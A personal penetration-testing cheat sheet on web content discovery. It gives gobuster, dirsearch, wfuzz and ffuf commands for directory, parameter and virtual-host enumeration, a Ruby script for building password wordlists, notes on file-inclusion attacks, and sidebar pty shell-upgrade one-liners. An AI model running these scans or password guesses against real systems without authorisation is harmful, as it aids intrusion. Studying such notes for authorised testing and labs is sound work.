akde/infosec

Information security is ultimately about managing risk


Directory enumeration

Hints:

  • Add –inse­curessl when deal­ing with HTTPS.
  • Don’t for­get to search for exploits for stan­dard cgi files!
  • Use dir­buster (UI) as well. Why not…

General search

nikto -host $victim
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

If there is the error “Error: error on pars­ing argu­ments: sta­tus-codes (“200”) and sta­tus-codes-black­list (“404”) are both set — please set only one. sta­tus-codes-black­list is set by default so you might want to dis­able it by sup­ply­ing an emp­ty string.”, use the ‑b flag:

gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -b 301

Alter­na­tive with dirsearch:

python3 /opt/dirsearch/dirsearch.py -u http://$target/ --random-agent -e php,html,sql -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r [--header "Authorization: Basic b2Zmc2VjOmVsaXRl"]

Searching for file suffixes

proxychains4 -q dirb http://$target/index /opt/wfuzz/wordlist/general/extensions_common.txt -t
gobuster dir -u http://$target -t 40 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.bak,.txt,.sql,.zip,.xml,.db,.sh

Search for cgi-bin related things

gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200,204,301,302,307,403,500' -e
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200' -e

Search within parameters

  • Assume, there is an URL like /index?file=bla.php
  • Then, use Gob­uster with the length para­me­ter and note the size of the error doc­u­ment:
    gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard
  • Per­form the search and remove all lines which have the exact size:
    gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard -x .php,.inc,.htm,.html | grep -v 2720

Search for endpoints / URLs

Use hakrawler to crawl the site and to return a list of unique end­points from this site.

echo "http://$target" | hakrawler -u

Creating wordlists from documents / HTML pages

With curl

curl http://$target/website | grep -oE '\w+' | sort -u -f | more

With Ruby

Use this Ruby script and add your HTML out­put / text to extract sig­nif­i­cant words you could try as pass­word or in a gob­uster wordlist.

require 'set'

# Sample stopwords list (add more based on the language you're working with)
STOPWORDS = Set.new(%w[the and is in of to for a on that by as with it at from this be an or are])

# Function to extract potential passwords from the text
def extract_significant_words(text)
  # Split the text into words, remove punctuation, and filter out stopwords and short words
  words = text.scan(/\b\w+\b/)
             .map(&:downcase)  # Normalize to lowercase
             .reject { |word| word.length <= 4 || STOPWORDS.include?(word) }
  
  # Count word frequencies
  frequency = Hash.new(0)
  words.each { |word| frequency[word] += 1 }

  # Filter out overly common words (words that occur too many times)
  threshold = words.size / 50  # Adjust this threshold as necessary
  significant_words = frequency.select { |word, count| count <= threshold }
  
  # Return the unique significant words
  significant_words.keys
end

# Example usage
text = <<-TEXT
Gaara is a character in the Naruto anime. He is a ninja from Sunagakure and became the Kazekage. Gaara fights using sand, controlled by his connection to Shukaku, the tailed beast.
TEXT

# Extract and print significant words
password_candidates = extract_significant_words(text)
puts password_candidates

Fuzzing parameters

With Wfuzz:

wfuzz -z range,0-10 --hl 97 http://$target/sator.php?p1=FUZZ

Exclud­ing con­tent: This makes requests from 0–100 for the post para­me­ter id_no and excludes all respones where the response body does­n’t con­firm to the reg­exp — here just a 3..

wfuzz -z range,0-100 -d "id_no=FUZZ" --hs 3 "http://faculty.htb/admin/ajax.php?action=login_faculty"

Interesting files

Vhost enumeration

ffuf -u http://linkvortex.htb/ -w subdomains.txt -H "Host: FUZZ.linkvortex.htb" -mc 200

Alter­na­tive:

gobuster vhost -u http://$VICTIM_DOMAIN/ --append-domain -w  /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 60

Alternative:

dnsrecon -d domain.com -D vhost_names.txt -t brt

Oth­er techniques

  • Use local file inclu­sion (LFI)
    • Try to change a file­name to read/parse a local file.
  • Use remote file inclu­sion (RFI)
    • Try to add a pro­to­col like http:// to include a file from anoth­er serv­er (my)

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';